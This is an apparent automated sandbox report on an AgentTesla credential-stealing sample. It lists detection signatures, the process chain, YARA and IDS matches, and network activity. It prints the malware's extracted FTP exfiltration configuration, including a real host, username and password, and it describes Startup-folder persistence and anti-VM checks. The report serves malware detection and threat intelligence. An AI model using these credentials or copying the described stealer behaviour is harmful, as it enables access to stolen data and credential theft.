Windows Analysis Report
SAL987656700.exe

Overview

General Information

Sample name: SAL987656700.exe
Analysis ID: 1584881
MD5: a885a9c7468691538b78d54852b5a59c
SHA1: 1b2340a366a6b28ac9d30f31bacef95afd0de595
SHA256: d2d196a12c822020c4042d607be77746951b6cb3c16201ff21ca8e9c5c786209
Tags: AgentTesla, exe, user-cocaman

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SAL987656700.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\SAL987656700.exe" MD5: A885A9C7468691538B78D54852B5A59C)
    • cunila.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\SAL987656700.exe" MD5: A885A9C7468691538B78D54852B5A59C)
      • RegSvcs.exe (PID: 2316 cmdline: "C:\Users\user\Desktop\SAL987656700.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5908 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cunila.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\enterogenous\cunila.exe" MD5: A885A9C7468691538B78D54852B5A59C)
      • RegSvcs.exe (PID: 5376 cmdline: "C:\Users\user\AppData\Local\enterogenous\cunila.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration:
{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(22 entries in total; only the first five are shown)

Source | Rule | Description | Author
5.2.cunila.exe.39b0000.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
5.2.cunila.exe.39b0000.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
5.2.cunila.exe.39b0000.1.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
5.2.cunila.exe.39b0000.1.raw.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.cunila.exe.39b0000.1.raw.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x3196b:$s2: GetPrivateProfileString
  • 0x31018:$s3: get_OSFullName
  • 0x32706:$s5: remove_Key
  • 0x328b3:$s5: remove_Key
  • 0x33795:$s6: FtpWebRequest
  • 0x34717:$s7: logins
  • 0x34c89:$s7: logins
  • 0x3798e:$s7: logins
  • 0x37a4c:$s7: logins
  • 0x393a1:$s7: logins
  • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
(18 entries in total; only the first five are shown)

                    System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , ProcessId: 5908, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , ProcessId: 5908, ProcessName: wscript.exe

                    Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\enterogenous\cunila.exe, ProcessId: 7164, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs

Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-01-06T17:03:20.250590+0100  2029927  1         A Network Trojan was detected  192.168.2.5  49711        162.241.62.63   21                TCP
2025-01-06T17:03:20.644800+0100  2855542  1         A Network Trojan was detected  192.168.2.5  49714        162.241.62.63   32929             TCP
2025-01-06T17:03:20.650314+0100  2855542  1         A Network Trojan was detected  192.168.2.5  49714        162.241.62.63   32929             TCP
2025-01-06T17:03:20.650314+0100  1800009  1         A Network Trojan was detected  192.168.2.5  49714        162.241.62.63   32929             TCP

                    AV Detection

Source: SAL987656700.exe | Avira: detected
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Avira: detection malicious, Label: DR/AutoIt.Gen8
Source: 3.2.RegSvcs.exe.3b0000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | ReversingLabs: Detection: 44%
Source: SAL987656700.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Joe Sandbox ML: detected
Source: SAL987656700.exe | Joe Sandbox ML: detected
Source: SAL987656700.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: cunila.exe, 00000002.00000003.2042437840.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000002.00000003.2044375496.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2177354650.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2178431472.0000000003D20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: cunila.exe, 00000002.00000003.2042437840.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000002.00000003.2044375496.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2177354650.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000005.00000003.2178431472.0000000003D20000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008BC2A2 FindFirstFileExW,0_2_008BC2A2
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F68EE FindFirstFileW,FindClose,0_2_008F68EE
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_008F698F
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008ED076
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008ED3A9
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008F9642
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008F979D
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_008EDBBE
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_008F9B2B
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_008F5C97
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0055C2A2 FindFirstFileExW,2_2_0055C2A2
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005968EE FindFirstFileW,FindClose,2_2_005968EE
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0059698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0059698F
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0058D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0058D076
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0058D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0058D3A9
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00599642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00599642
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0059979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0059979D
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00599B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00599B2B
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0058DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0058DBBE
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00595C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00595C97
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\

                    Networking

Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49711 -> 162.241.62.63:21
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49714 -> 162.241.62.63:32929
Source: Network traffic | Suricata IDS: 1800009 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Passwords : 192.168.2.5:49714 -> 162.241.62.63:32929
Source: Yara match | File source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.5:49714 -> 162.241.62.63:32929
Source: global traffic | TCP traffic: 192.168.2.5:53370 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive (2 requests)
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 162.241.62.63
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: unknown | DNS query: name: ip-api.com
Source: unknown | FTP traffic detected: 162.241.62.63:21 -> 192.168.2.5:49711
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 1 of 150 allowed.
  220-Local time is now 10:03. Server port: 21.
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 entries)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 entries)
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_008FCE44
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive (2 requests)
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: ftp.antoniomayol.com
Source: global traffic | DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: RegSvcs.exe, 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2187681687.0000000000855000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4470758014.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegSvcs.exe, 00000003.00000002.2189912177.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4471177683.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 2.2.cunila.exe.3970000.1.raw.unpack, R1W.cs | .Net Code: HAg81
Source: 5.2.cunila.exe.39b0000.1.raw.unpack, R1W.cs | .Net Code: HAg81
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_008FEAFF
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_008FED6A
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0059ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0059ED6A
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_008EAA57
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_00919576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00919576
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005B9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_005B9576

                    System Summary

Source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: SAL987656700.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SAL987656700.exe, 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_a6328b78-8
                    Source: cunila.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: cunila.exe, 00000002.00000002.2046156947.00000000005E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2367c13d-1
                    Source: cunila.exe, 00000002.00000002.2046156947.00000000005E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c282a4ae-c
                    Source: cunila.exe, 00000005.00000002.2189121086.00000000005E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3ff0ba67-c
